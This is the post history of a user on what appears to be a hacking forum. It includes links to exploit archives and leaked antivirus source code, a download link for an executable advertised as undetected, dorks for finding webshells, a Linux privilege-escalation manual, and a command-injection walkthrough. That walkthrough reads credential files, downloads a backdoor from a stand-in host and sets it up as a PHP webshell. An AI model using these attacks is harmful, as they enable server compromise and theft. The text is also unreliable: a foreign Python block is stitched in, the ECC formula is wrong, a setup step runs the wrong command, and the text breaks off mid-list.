
ionut97
Active Members
Posts: 233
Days Won: 14

Everything posted by ionut97

  1. Something interesting. It contains:
     [dir] Exploits             2011-Jun-09
     [dir] GSM Hacks            2011-Jun-03
     [dir] Linux                2011-Jun-24  *Nix!
     [dir] Local Root Exploits  2011-Jun-03
     [dir] Misc                 2011-Jun-03  Papers and Videos
     [dir] OSX                  2011-Jun-24  Mac
     [dir] UNIX                 2011-Jun-24  Novell, etc...
     [dir] Virii                2011-Jun-03
     [dir] Win32                2011-Jun-24  Win95, 98, NT, 2000, and XP
     [dir] Word Lists
     Link: Index of ../database/
     Lots of videos, tutorials, exploits, tools, etc.
  2. I haven't verified it. I took it from abh.
  3. File: popelle.exe
     Size: 90112 bytes
     MD5: 1fbcfdb365c38f8573c802684777fe8d
     SHA1: d91f4ff1f823c8cf4f9f4fc211102127bcd7280b
     Result: 0/35
     Status: Clean
     AVG Free - OK, ArcaVir - OK, Avast 5 - OK, AntiVir (Avira) - OK, BitDefender - OK, VirusBuster Internet Security - OK, Clam Antivirus - OK, COMODO Internet Security - OK, Dr.Web - OK, eTrust-Vet - OK, F-PROT Antivirus - OK, F-Secure Internet Security - OK, G Data - OK, IKARUS Security - OK, Kaspersky Antivirus - OK, McAfee - OK, MS Security Essentials - OK, ESET NOD32 - OK, Norman - OK, Norton Antivirus - OK, Panda Security - OK, A-Squared - OK, Quick Heal Antivirus - OK, Rising Antivirus - OK, Solo Antivirus - OK, Sophos - OK, Trend Micro Internet Security - OK, VBA32 Antivirus - OK, Vexira Antivirus - OK, Zoner AntiVirus - OK, Ad-Aware - OK, BullGuard - OK, Immunet Antivirus - OK, K7 Ultimate - OK, VIPRE - OK
     http://www.mediafire.com/?ng5lzgyzgyy // Done, I've put up another link.
  4. Hak5 - YouTube. An interesting channel with over 500 videos.
  5. I recently found an interesting site: adamas.ai - veritas vos liberabit. As I said, it contains: ebooks, ezines, Musik, Scripts, Stuff, Tutorials, Videos. Including:
     http://download.adamas.ai/dlbase/Stuff/KASPERSKY_AV_2k8_SOURCECODE_leak.rar
     http://download.adamas.ai/dlbase/Stuff/SYMANTEC_pcAnywhere_SOURCE_leak.rar
     http://download.adamas.ai/dlbase/Stuff/Norton_AntiVirus_2k6_SOURCE_leak.tar.gz
     I haven't looked through all of it. It's mostly about malware.
  6. http://www.youtube.com/watch?v=njQSxoDBT6E&feature=player_embedded
  7. Video: https://www.youtube.com/watch?feature=player_embedded&v=4TrsFry13TU Download: http://dl.dropbox.com/u/55144650/t00...0-%20win32.zip [x86] http://dl.dropbox.com/u/55144650/t00...0-%20win64.zip [x64] Page: http://exploitpack.com/
  8. Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to install or administer their own webserver. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them, providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiasts, classroom labs, and vulnerability assessment tool targets.
     Change log, Mutillidae 2.1.20:
     - Changed some color schemes.
     - Bug fix: The html5 key validation on the html5 page was too restrictive. The validator was throwing errors even when the input was ok. This validation checks for any non-alphanumeric characters and prints an error if non-alphanumeric characters are found. This error message contains the bad key the user input. Since the site fails to output encode this error message, it is possible to perform DOM injection.
     - Added html5-storage.php to the vulnerabilities listing.
     Download Mutillidae 2.1.20
  9. Try:
     inurl:uploadimages.asp
     inurl:uploadlogo.asp
     inurl:uploadpictures.asp
     inurl:uploadgallery
     inurl:uploadfile.asp
     inurl:uploadtest.asp
     intitle:Test Free ASP Upload
     Or for shells already uploaded:
     inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"
     "Shell" filetype:php intext:"uname -a:" "EDT 2010"
     intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
     inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
     inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
     intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
  10. Description: In this video, I have demonstrated how to upload a shell to a server when the .php or .asp extensions are not allowed for upload.
  11. Cryptography is the study and practice of hiding information. There are a few examples of cryptography that are used in business and government to help prevent unwanted disclosure of messages and other types of information. Find out information on the most popular types and how they are used.

     Symmetric Cryptography

     There are different examples of cryptography. Symmetric cryptography includes methods of encryption that are best suited for processing large streams of data. It is distinguished by the use of a single key for encrypting and decrypting messages by the sender and receiver. This type of cryptography is categorized by the use of stream or block ciphers. Stream ciphers operate by encrypting single bits or bytes of information (or plaintext) at a time and implement a feedback mechanism to constantly change the key. Alternatively, block ciphers encrypt data in individual fixed-size groups of bits (a common size is 128 bits) using the same key. An advantage of symmetric cryptography is that its methods are inexpensive for creating and processing encrypted data. The disadvantage of this example of cryptography is that both the sender and receiver of the message have to agree on the key. If the key is discovered, the encrypted information becomes compromised. The following are popular examples of cryptography that have used symmetric encryption:
     - International Data Encryption Algorithm (IDEA)
     - Advanced Encryption Standard (AES)
     - Data Encryption Standard (DES)
     - Twofish is a 128-bit block cipher that uses 128/192/256-bit keys.
     - Camellia is similar to AES and is a 128-bit block cipher. Used in 32-bit processors and 8-bit processors (smart cards).
     - MISTY1, made by Mitsubishi. It is a 128-bit block cipher and used in computer hardware/software.
     - Skipjack

     Asymmetric Cryptography

     Asymmetric cryptography (also called public key cryptography) encryption methods are best used for key exchange and user authentication. This type of cryptography is commonly used in digital signatures. It is distinguished by the use of a private and a public key that are created with one-way functions using multiplication and exponentiation. One key is public and published in a public directory, while the private key is only known by the receiver of the message. The following are applications that use asymmetric cryptography:
     - Transport Layer Security (TLS), a communications protocol which is replacing Secure Socket Layer (SSL) for transmitting data over the Internet.
     - RSA is used in electronic commerce protocols, software production, key exchange and digital signatures. It implements a variable-size encryption block and key.
     - PGP (or Pretty Good Privacy) is used for the authentication of data communication and encrypting/decrypting email messages.
     - GnuPG/GPG (GNU Privacy Guard) is a standard that tracks the specifications of OpenPGP.

     Elliptic Curve Cryptography

     Elliptic curve cryptography is a standard method used by NIST, ANSI and IEEE for government and financial institution use. It is based on public key encryption and used in mobile and wireless environments. Public keys are created by utilizing the following algebraic equation: y^2 = x^3 + 3 + Ax + B, where the x and y points on a curve are used to calculate a public key. The private key is a random number. The appeal of elliptic curve cryptography is that it offers security with smaller key sizes, which result in faster computations and lower power consumption, memory and bandwidth use.

     Quantum Cryptography

     Quantum cryptography methods use photons to create encrypted keys that can be sent over optical fiber networks by using beams of light. It uses "qubits", which are essentially computer bits in quantum form. Keys are created using a procedure called quantum key distribution (QKD). In this method, photons are transmitted in horizontal and vertical directions with the use of a laser source over a quantum channel. A unique property of this example of cryptography is its ability to detect the presence of anyone that tries to obtain the quantum key. Any attempt would be noticed by the sender and receiver by a high increase in the transmission error rate. Since photons cannot be copied or divided, keys are virtually unbreakable. Currently, these types of methods can only produce and distribute encrypted keys. However, as of 2010, Japan is working on testing new quantum cryptography methods that can be used to secure video conferencing for government communications.

     Final Thoughts on Cryptography

     While there are many examples of cryptography, security of information is never one hundred percent perfect. Even though more complex encryption methods are always being created, sophisticated hackers can learn to adapt and find a way to crack these systems. We just need to try and be one step ahead of the game.

     Source: Examples of Cryptography used in Business and Government Applications
  12. Bright Hub Quizzes.
     COMPUTING
     Computer Hardware: Are You a Computer Hardware Expert?; Computer History Quiz; How Much Do You Know About Graphics Cards?; The PC Part Compatibility Quiz; Think You Know Computers? Take Our Quiz and Test Your Knowledge; What Does This Piece Do?; Who's the Most Evil? Test Your Knowledge of Tech Company Transgressions
     Computer Security: Quiz: Do You Know Computer Viruses?; How Safe Is Your Wi-Fi Connection?; Quiz: How Secure is Your Computer?; Test Your Computer Security Skills With the Malware Open Challenge
     Google: Do You Know Everything About AdSense?; Do You Really Know How to Use Google? Take Our Quiz to Test Your Google Search Basics!; Google AdWords: Quiz Yourself; Google on the Brain: a Quirky Quiz
     Linux: Just Started Using Linux? Test Your Knowledge!; Test Your Knowledge of Linux and Open Source Computing History; Reckon You Know Everything There is to Know About Linux?
     Mac: Are You Up to Speed in Lion?; Test Your Knowledge of Apple History; Steve Jobs Said What?; Take the Mac Challenge: How Much Do You Know?; Test Your Computer Chops with Our Macintosh Guru Quiz; Test Your Steve Jobs Fandom: A Quiz
     Security & Privacy: How Well Do You Know Your Network Security Terminology? Test Yourself!; Test Your Internet Safety Knowledge
     Windows: A Quiz for Microsoft Word Professionals; Are You a Windows Expert? See How Much You Know; Are You an MS Office Expert? Test Your Knowledge; Think You Know Your Windows Computer?; New to Microsoft Word? Find Out How Much You Know!; So You Think You Can Use Microsoft Excel? A General Knowledge Quiz; Test Your Microsoft History Knowledge
     Web Development: Are You a Master of CSS? Quiz Yourself and Find Out; How Well Do You Really Know SQL?
  13. Awareness of what's happening on your network, and why, makes the difference between average and excellent network administration. Great tools are needed to obtain this knowledge quickly and accurately. Fortunately, some of the best network monitoring tools are free. This article lists the top five.

     What Makes a Great Network Monitoring Tool?

     Some of the very best network monitoring tools have always been free. Vendors sometimes even incorporate code based on RRDTool and MRTG into their products. Templates, free utilities, scripting, and a little web code can create a custom monitoring interface that's ideal for you and costs nothing more than the time to put it together. More advanced and detailed monitoring most often involves SNMP, which can have a steep learning curve for the beginner. Large amounts of data are generated and collected by monitoring tools. Some of this data is essentially invisible until you begin measuring and collecting it. Commercial tools can "hide" this complexity, which is one reason you might pay for them. The data is there if you're willing to make the effort to obtain it. Transforming it into useful, accurate information is what makes a great monitoring tool.

     The Top Five

     1. MRTG - The Multi Router Traffic Grapher (MRTG) is primarily designed to monitor and graph traffic on network links. It is written in Perl and generates HTML with PNG image graphs, updated at configurable intervals. One of the best features is that it creates daily, weekly, and monthly graphs as well. You can monitor any SNMP variable you choose. In my opinion, MRTG is one of the best tools ever written for network monitoring.
     2. Cacti / RRDTool - Cacti is a front end to RRDTool and uses a MySQL database for data storage. Data sources can be created and customized. The front end is written in PHP. Many templates are available, as well as the option to grant users permissions to view only or create new graphs.
     3. Nagios - Nagios goes beyond network monitoring to include notification and problem management, as well as other enterprise-class features. It has been around for over 10 years and has a large user base and support community. While some of the solutions in the top five are OS agnostic, Nagios runs on Linux or Unix. You can monitor any system or device with it, of course.
     4. Ntop - Ntop is focused specifically on network traffic monitoring: IP traffic and protocol information and statistics. Information can be sorted or detailed by host or subnet, or viewed in total for the network. Ntop works with NetFlow and sFlow as well. Interestingly, it can be compiled for Windows as well as Unix.
     5. Zenoss Core - If you're looking for an enterprise management platform for more than just the network, but don't have the budget for a commercial product, Zenoss has an open source alternative. Zenoss offers Professional and Enterprise versions with support and consulting available.

     Honorable Mentions

     SolarWinds Cisco Netflow v5 - This and several other SolarWinds free tools are excellent. If you have a Cisco network with Netflow, this can get you started.
     Snort - Snort is technically an IDS (and one of the best), but can serve as a great application layer network analysis tool. I didn't include this or any other IDS as they are really a separate category.

     Need More?

     Advanced monitoring, alerts, and reporting can be built from the tools in the free and open source arena, but you or your management may decide that a commercial tool or platform is a better investment. Major network equipment vendors almost always integrate easily with the most common monitoring platforms, or those vendors provide plugins and templates for SNMP data from a wide variety of equipment. Tuning and filtering data, reports, and alerts so that the NOC or helpdesk isn't inundated with redundant or irrelevant data is a big part of integrating a monitoring solution for an enterprise. There are so many possible commercial solutions, and so many ways to implement them, that a "best" choice there is unique for each business, in my experience. Using these free tools, or others that you find, is a great way to augment your knowledge and awareness of the state and health of your network.

     Source: http://www.brighthub.com/computing/smb-security/articles/35543.aspx
  14. Abusing users with '.' in their PATH:

     Unfortunately users and sometimes admins are lazy; it's human nature to want to avoid taking unnecessary steps. In this case the user would rather type:
       $ program
     instead of
       $ ./program

     ************
     Newbie Note: Having '.' in your PATH means that the user is able to execute binaries/scripts from the current directory.
     ************

     To avoid having to enter those two extra characters every time, the user adds '.' to their PATH. This can be an excellent method for an attacker to escalate his/her privilege. For example: Joe (the attacker) happens to know that Suzy has sudo privileges to change users' passwords; unfortunately for the admins, she also has the power to change the root password. Now Suzy is a lazy girl and thus has '.' in her PATH. Joe places a program called 'ls' in a directory Suzy often visits. This 'ls' program contains code to modify root's password. Now when Suzy enters that directory and asks for a listing, because she has '.' in her path, the 'ls' that Joe placed in the directory is run instead of /bin/ls. Now root's password has been changed, and Joe is able to log on as root.

     Having '.' in your PATH can also help the attacker when exploiting programs that make system(), execvp(), or execlp() calls to other programs: if they do not specify the full path to the program, the attacker can place a program into a directory in the PATH so that program is run instead. This works because programmers just expect that the program they mean to run will be in the PATH.

     ************
     Newbie Note: To add '.' to your path, type this at the prompt: PATH=.:${PATH} and then, to be able to use the '.' in your path, enter export PATH.
     ************

     ************
     Countermeasures:
     1) Do not include '.' in your path!
     2) Place the following at the end of your .bashrc or .profile. This will remove all occurrences of '.' in your PATH.
        PATH=`echo $PATH | sed -e 's/::/:/g; s/:\.:/:/g; s/:\.$//; s/^\.://; s/^://'`
     ************

     Shell Escape Sequences:

     Many programs offer escape sequences to display a shell to the user, programs such as:
     - emacs: by entering alt+!
     - vi: by entering :![commandname]
     - man: by entering ![command name]
     replacing [command name] with the program you wish to run.
     - Old Linux games that incorporate a TBIC (the boss is coming) feature to escape to a shell.
     If you are able to use an escape sequence on a program that has the suid bit set, you will be given the privileges of the owner of the file. Escape sequences can help an attacker greatly because they are so easy, although you will rarely find an escape sequence nowadays that will elevate your privilege to that of root. Try using different ctrl+[character] combinations to try and find escape sequences. For example, say that a text file had the suid bit set, and the user opened it up in vi; they could then enter :!/bin/bash, and they are given a suid root shell!

     ************
     Countermeasures:
     1) Remove any suid games, or files that could easily be exploitable by shell escape sequences. To find all suid files on your system use the following command:
        find / -type f -perm -4000
     ************

     IFS Exploit:

     The IFS exploit is pretty straightforward, although to the beginner it may seem a tad confusing. The IFS (or Internal Field Separator) is used to separate words/arguments etc. In the English language we use the ' ' (space) character to separate arguments from their commands. With an IFS set to ' ' (space), the command "ls -al" has the space between 'ls' and '-al' to separate the command from its argument. With an IFS set to ';' (semicolon), the command "ls;-al" will have the same effect as "ls -al", because we have said we wish to use the ';' instead of the space. So it uses a ';' to separate the command from its argument. A hacker can make practical use of the IFS to escalate his/her privilege.

     For example: let's say that at every logon a suid program (/usr/bin/date) executes /bin/date and displays the output on screen. An attacker can take advantage of this by doing the following (I will explain the workings of the privilege elevation afterwards; I have numbered the lines to make the explanation easier; the '$' is the symbol for a standard command prompt, and the '#' is the symbol for the root command prompt).
       1) $ cat /home/nick/bin
       2) ...#!/bin/bash
       3) .../bin/sh #this script will execute /bin/sh
       4) $ ls -al /usr/local/date
       5) ---s--x--x 1 root root 21673 Mar 9 18:36 date
       6) $ PATH=/home/nick:${PATH}
       7) $ export PATH
       8) $ IFS=/
       9) $ export IFS
       10) $ /usr/local/date
       11) # whoami
       12) root
     I will now explain the above in detail:
     Lines 1, 2, 3: the attacker creates a simple bash script that runs /bin/sh when executed.
     Lines 4 and 5: the attacker checks the permissions for the suid program that calls /bin/date.
     Lines 6 and 7: adds '/home/nick' to his PATH (where the 'bin' program he wrote earlier is).
     Lines 8 and 9: he sets the IFS to '/'. This means that instead of using a space, the '/' will be used, so the program, instead of calling '/bin/date', will call 'bin date'. Because he has placed a program called 'bin' in the home directory (which is now in the PATH), when /usr/local/date is executed it will execute /home/nick/bin with the permissions of /usr/local/date, which means the attacker will get a root shell!
     Lines 11, 12: the attacker runs 'whoami' to verify that he is root; line 12 confirms this.

     ************
     Countermeasures:
     An easy way of attempting to stop IFS exploits is to not allow users to execute any type of executable or suid programs in places that the users can write to. Directories such as /home/[username] and /tmp allow the user write permissions, which means that they can create programs and then run them from that location. If directories such as /home and /tmp are on their own partitions, you can disallow users from running suid programs, or any executables for that matter, by adding the correct options to /etc/fstab. You can do this by replacing a line similar to this:
        /dev/hda6 /tmp ext3 defaults 0 0
     with this:
        /dev/hda6 /tmp ext3 nosuid,noexec 0 0
     This type of countermeasure is not only useful to stop IFS attacks, but pretty much all attacks concerned with privilege escalation discussed in this manual.
     ************

     LD_PRELOAD Exploit:

     This attack involves .so files (part of the dynamic link library) being used by programs. The attacker can add a program pretending to be one of these libraries so that when a program is run it will execute the program pretending to be a library. This is useful if you are calling a program that has the suid bit set to root. So when the program is first run, it will attempt to load the library it requires (but it has been replaced with code the attacker wants executed) and thus runs the commands in the program placed by the attacker, with the permissions of the owner of the calling program. A full example of this is demonstrated below:
       1) $ cat me-root.c
       2) ...#include <stdio.h>
       3) ...#include <unistd.h>
       4) ...main()
       5) ...{
       6) ......setuid(0);
       7) ......setgid(0);
       8) ......printf("Congratulations you are root!");
       9) ...}
       10) $ gcc -o me-root me-root.c
       11) $ ls -l me-root
       12) ---s--x--x 1 root root 4365 Mar 16 14:05 me-root
       13) $ cat me-root_so.c
       14) ...void printf(char *str)
       15) ...{
       16) ......execl("/bin/sh","sh",0);
       17) ...}
       18) $ gcc -shared -o me-root_so.so me-root_so.c
       19) $ LD_PRELOAD=./me-root_so.so
       20) $ export LD_PRELOAD
       21) $ ./me-root
       22) # whoami
       23) root
     I will explain the above attack in detail:
     Lines 1 to 9: The attacker creates a simple C program that sets the userid and groupid to 0 (root).
     Line 10: The attacker compiles the program created above and calls it me-root.
     Lines 11 & 12: The attacker checks the file permissions on the me-root program.
     Lines 13 to 17: The attacker creates the program that will pretend to be part of a library; it executes /bin/bash.
     Line 18: The attacker compiles the pretend library program as a shared library and calls it me-root_so.so.
     Lines 19 & 20: The attacker adds me-root_so.so to LD_PRELOAD and exports it, so now when me-root is run it will execute the program me-root_so.so (pretending to be a library) with the permissions of me-root (in this case the permissions of userid 0, which is the root account!).
     Line 21: The attacker runs the me-root program.
     Lines 22 & 23: The attacker verifies who s/he is; line 23 confirms s/he is root.

     Symlinks:

     Symlinks or symbolic links are a very useful tool in Linux. They allow us to make a "shortcut" (in Windows terms) to a file or folder. For example:
        ln -s /etc/passwd /tmp/passwd_file
     This creates a link called /tmp/passwd_file to /etc/passwd, so now whenever /tmp/passwd_file is opened it will open /etc/passwd. Although symlinks can be infinitely useful, they are quite easily exploitable. Let's say, for example, that Joe the attacker is feeling particularly sneaky. Joe knows root uses '.' in his path, and that all users can post technical problems to the admin in a directory /usr/problems/. The attack is below, and the full description will follow:
       1) $ ln -s /root/.rhosts /tmp/root-rhost
       2) $ stat /tmp/root-rhost
       3) ...stat: cannot stat /tmp/root-rhost
       4) $ cat /usr/problems/ls
       5) ...#!/bin/bash
       6) ...if [ ! -e /tmp/root-rhost ] ; then
       7) ......echo "+ +" >>/tmp/root-rhost
       8) ...fi
     I will explain the above attack in detail:
     Lines 1, 2 & 3: The attacker creates a symbolic link from /tmp/root-rhost to /root/.rhosts, and uses stat to see if the file existed; the output on line three indicates that /root/.rhosts does not exist (the admin removed /root/.rhosts because he saw this file as a security threat; this is what Joe wants).
     Lines 4 to 8: He then creates a bash script called ls (which will be run instead of /bin/ls, because '.' is first in root's path, when root wants to list the contents of /usr/problems/). This program tests if /tmp/root-rhost exists; because it is a symbolic link pointing to /root/.rhosts (which does not exist), it will return that /root/.rhosts does not exist, so it will then echo "+ +" into /tmp/root-rhost, which will be forwarded into the file /root/.rhosts! This will mean that root will have a passwordless login over any login that supports and allows rhosts authentication (e.g. rlogin and ssh). The trap is now set; he just has to wait!

     Cron jobs with symlinks can also be used to an attacker's advantage, for example: The 'sales' group in businesscorp.com have a folder to post their documents for the whole group to read and write to. Unfortunately the users keep forgetting to add group write permissions to their documents, so the admin developed a script that will change the files in the sales folder to the group sales and set group writeable permissions. This script is run periodically through a cron job; the script looks like the below:
       1) #!/bin/bash
       2) chgrp -R sales /usr/export/sales
       3) chmod -R g+w /usr/export/sales
     If someone sneaky in sales decided to make two symlinks to /etc/passwd and /etc/shadow, the cron job would follow the symlinks and set write permissions for the group sales on /etc/passwd and /etc/shadow. From here the attacker can change any password s/he wants.

     Source: Privilege Escalation
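The '.'-in-PATH scenario and its countermeasure in the post above, as an added example that is not part of the manual: a small Python simulation of how the shell walks PATH left to right (so an attacker's planted /usr/problems/ls wins over /bin/ls as long as '.' or an empty field comes first), together with a sanitizer that does what the sed one-liner intends but also drops a leading '.', empty fields, relative entries and duplicates, and never removes a legitimate one-character directory the way an unescaped '.' in sed would. The directory layout, the PATH value and the function names are constructed for the demonstration.

```python
"""Simulate PATH command lookup and sanitize a PATH that contains '.'.

Added example, not code from the manual. The file layout below is
constructed: it stands in for a host where an attacker has planted
/usr/problems/ls next to the real /bin/ls.
"""
import posixpath

PATH_SEP = ":"  # POSIX PATH separator


def resolve_command(cmd, path, cwd, existing_files):
    """Return the file the shell would execute for `cmd`, walking PATH in order.

    An empty field or '.' in PATH means "the current working directory", which
    is exactly what the Joe/Suzy scenario relies on.
    """
    for entry in path.split(PATH_SEP):
        directory = cwd if entry in ("", ".") else entry
        candidate = posixpath.join(directory, cmd)
        if candidate in existing_files:
            return candidate
    return None


def sanitize_path(path):
    """Drop every PATH entry that resolves relative to the current directory.

    Returns (cleaned_path, dropped_entries). Compared with
    sed 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://', this also removes a leading
    '.', empty fields ('::' or a trailing ':'), relative names such as 'bin'
    and duplicates, and it only ever drops a literal '.' (sed's unescaped '.'
    matches any single character).
    """
    kept, dropped = [], []
    for entry in path.split(PATH_SEP):
        if entry in ("", ".") or not entry.startswith("/"):
            dropped.append(entry)
        elif entry not in kept:
            kept.append(entry)
    return PATH_SEP.join(kept), dropped


# Constructed host: the attacker's 'ls' lives in a directory root often visits.
FILES = {"/bin/ls", "/usr/bin/whoami", "/usr/problems/ls"}
LAZY_PATH = ".:/usr/local/bin::/usr/bin:bin:/bin:"


def demo():
    """Run the lookup before and after sanitizing; returns the four results."""
    before = resolve_command("ls", LAZY_PATH, "/usr/problems", FILES)
    clean, dropped = sanitize_path(LAZY_PATH)
    after = resolve_command("ls", clean, "/usr/problems", FILES)
    return before, clean, dropped, after


if __name__ == "__main__":
    before, clean, dropped, after = demo()
    print("with '.' in PATH, 'ls' resolves to:", before)
    print("sanitized PATH:", clean, "dropped:", dropped)
    print("after sanitizing, 'ls' resolves to:", after)
```

Running it shows the planted /usr/problems/ls being chosen under the lazy PATH and /bin/ls being chosen once the '.', empty and relative entries are gone; the dropped list is what you would want to log when a login script silently rewrites a user's PATH.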
  15. Command injection, also known as Remote Code Execution in terms of web exploitation, is possible when a website accepts added strings of characters or arguments and uses those inputs as arguments for executing a command on the website's hosting server. This makes it another common web application vulnerability that allows an attacker to execute arbitrary code on the system. In fact it is included in the OWASP (Open Web Application Security Project) Top Ten Web Application Security Risks.

     Let us take a look at the image shown above, which happens to be our target and example for today. It shows a simple user interface for querying the DNS (Domain Name System) by inserting any Internet Protocol address or host name in the dialog box. Now let us look at the sample vulnerable code for command execution or injection:

       <?php
       if (isset($_POST["dns-lookup-php-submit-button"])){
           try{
               if ($targethost_validated){
                   echo '<p class="report-header">Results for '.$lTargetHostText.'<p>';
                   echo '<pre class="report-header" style="text-align:left;">';
                   echo shell_exec("nslookup " . $targethost);
                   echo '</pre>';
                   $LogHandler->writeToLog($conn, "Executed operating system command: nslookup " . $lTargetHostText);
               }else{
                   echo '<script>document.getElementById("id-bad-cred-tr").style.display=""</script>';
               }// end if ($targethost_validated){
           }catch(Exception $e){
               echo $CustomErrorHandler->FormatError($e, "Input: " . $targethost);
           }// end try
       }// end if (isset($_POST))
       ?>

     I got the code above from the dns-lookup.php file of a free and open source vulnerable web application that I have been playing with, Mutillidae from Irongeek.com, developed by Adrian "Irongeek" Crenshaw and Jeremy Druin. Mutillidae is a web application for you to practice your Web Fu skills like SQL injection, cross site scripting, HTML injection, JavaScript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more. It is packed with vulnerable pages, hints and walk-throughs in case you don't have an idea of how the exploit is done. I decided to use this web application so that you could also try out this tutorial or writeup.

     Okay, now let's try to query a random IP address, 74.125.31.102. Did you notice the echo shell_exec() function in the script? If you look closely at the code, you should be able to see shell_exec("nslookup " . $targethost) in it. With the nslookup command, a user can look up the IP address of a domain or host on a network. Linux uses "&&" to link commands and ";" as a command separator. Now, let's try the command echo, but I prefer using the | (vertical bar) instead of && to check if it is vulnerable to command injection:
       | echo 'hello'
     In this case the target is vulnerable to command injection or execution. It's just like issuing the command nslookup | echo 'hello' in the terminal. But why do I prefer using the pipeline or vertical bar rather than '&&'? Well, this image should enlighten you: the vertical bar tells the shell to provide the output of the command on the right (this is called a pipeline), while the '&&' links the commands nslookup and uname -a, which outputs the DNS of the IP address and the kernel version of the host. In some cases && just doesn't work, and sometimes you need to put a value before the pipeline, like: 1 | echo 'Infosec Institute'. But so much for that; let's continue gathering some information on the webserver. Because we used the command uname -a, we were able to identify information about the system: it runs Linux kernel release 3.0.0-16, the network node hostname is projectX, the operating system is GNU/Linux, etc.

     Now let's probe or check which Linux distribution this server is:
       | cat /etc/issue
       | cat /etc/*-release
       | cat /etc/lsb-release
       | cat /etc/redhat-release   (for rpm based distros)
     Hey, it's BackBox Linux, which is one of my favorite penetration testing distros, based on Ubuntu. Time to figure out where we are now and list all the directories:
       | pwd ; ls -la
     As an information gatherer, it is our task to check what services are running and which service belongs to a specific user privilege:
       | ps aux
       | ps -ef
       | top
       | cat /etc/service
     Attackers may also check if there are any settings that are misconfigured, or some logs to check if anything can be exploited, or if there are vulnerable plugins attached. Below are other commands for specific directories that are used in probing the web server:
       | cat /etc/environment
       | cat /proc/self/environ
       | cat /etc/shadow
       | cat /etc/sudoers
       | cat /etc/group
       | cat /etc/security/group
       | cat /etc/security/passwd
       | cat /etc/security/user
       | cat /etc/security/environ
       | cat /etc/security/limits
       | cat /usr/lib/security/mkuser.default
       | cat /var/log/messages
       | cat /var/log/mysql.log
       | cat /var/log/user.log
       | cat /var/www/logs/error_log
       | cat /etc/syslog.conf
       | cat /etc/chttp.conf
       | cat /etc/lighttpd.conf
       | cat /etc/cups/cupsd.conf
       | cat /etc/inetd.conf
       | cat /etc/apache2/apache2.conf
       | cat /var/log/apache2/error.log
       | cat /etc/my.conf
       | cat /etc/httpd/conf/httpd.conf
       | cat /opt/lampp/etc/httpd.conf
       | ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
       | cat /etc/resolv.conf
       | cat /etc/sysconfig/network
       | cat /etc/networks
       | /sbin/ifconfig -a
       | cat /etc/network/interfaces
       | ls -alh /var/spool/cron
       | ls -al /etc/ | grep cron
       | ls -al /etc/cron*
       | cat /etc/cron*
       | cat /etc/at.allow
       | cat /etc/at.deny
       | cat /etc/cron.allow
       | cat /etc/cron.deny
       | cat /etc/crontab
       | cat /etc/anacrontab
       | cat /var/spool/cron/crontabs/root
     Most attackers are interested in backdooring a Linux webserver, so they need to probe first and try to see how files can be uploaded, so that they can deliver the finishing touch.
       | find / -name wget
       | find / -name nc*
       | find / -name netcat*
       | find / -name tftp*
       | find / -name ftp
     I think I'll try wget then, so I just need to try and download a text file from a certain URL I found in the Google search engine.
       | wget http://whateversite.com/hackers/resources/digital%20rebels/articles/unixhck.txt
     The wget command allows non-interactive download of files from the Web and it supports the HTTP, HTTPS, and FTP protocols. Let's check if the file was really uploaded by typing these commands:
       | ls -la
       | cat unixhck.txt
     Great, now I have downloaded a text file of Sir Hackalot's tutorial about Unix hacking to the web server. Now let's try to upload a backdoor shell in a text file. In this example I will be using an r57 backdoor shell from another source.
       | wget http://whateversite.com/backdoor.txt
     Now let's make a PHP backdoor shell by copying the contents of backdoor.txt to newfilename.php (I'll just make a new backdoor.php file).
       | cp backdoor.txt backdoor.php
     Now time to check the backdoor shell. Most backdoor shells have the shell_exec() function too; that's why you can execute commands on them more easily. Because it allows command execution, attackers may also use it for running their malicious scripts like IRC bots, scanners, mass SSH scanners, bruteforcers, etc. For example:
       perl udp.pl ./a 124.104
       perl wetwork.pl
       perl timthumbexploiter.pl
       python bot.py

     Tips for Preventing Remote Code Execution:
     1. Disable the shell_exec() function if you do not plan to use it, to prevent arbitrary code execution, or if you just want to get rid of this security risk.
     2. But if you really need the shell_exec() function for a certain PHP file or form, then use the escapeshellarg() function, which escapes shell metacharacters, and the escapeshellcmd() function, which is used to escape single arguments to shell functions coming from user input. Both of these functions escape potentially dangerous characters in the string.
     3. Adding a WAF or web application firewall could also help, although I cannot guarantee 100 percent security since some WAFs can still be bypassed, but at least there is some prevention. It also depends on the lockdown. I prefer using ModSecurity for hardening your Apache web server in Linux/Unix because it is an open source web application firewall which helps you detect and prevent common attacks against web applications like SQL Injection, XSS, Command Injection or Execution, etc. And so I decided to share a simple guide for installing ModSecurity, just in case you want to try it out.

     Setting up ModSecurity on your web server running Ubuntu and Debian based distros:
     1. Type this in your terminal emulator:
          sudo apt-get install libapache2-modsecurity
        This should install new packages for libapache2-modsecurity and modsecurity-crs.
     2. Create a directory for ModSecurity in the Apache2 folder:
          sudo mkdir /etc/apache2/modsecurity
     3. Create a configuration file for ModSecurity, which will be loaded by Apache, using this command:
          sudo nano /etc/apache2/conf.d/modsecurity.conf
        Add the following code, save and exit (Ctrl+X, type Y to agree to the changes to the file, then press Enter to save):
          ## /etc/init.d/apache2/conf.d/modsecurity.conf
          Include modsecurity/*.conf
     4. Set the ModSecurity rules using these two commands:
          cd /etc/apache2/modsecurity
          sudo cp -R /usr/share/modsecurity-crs/base_rules/* .
     5. Modify and correct the line in the modsecurity_crs_20_protocol_violations.conf file:
          sudo nano /etc/apache2/modsecurity/modsecurity_crs_20_protocol_violations.conf
        Replace this line:
          SecRule REQBODY_ERROR "!@eq 0"
        with this one:
          SecRule REQBODY_PROCESSOR_ERROR "!@eq 0"
        Then save and exit.
     6. Now restart the Apache web server.
          sudo service mysql start
     7.
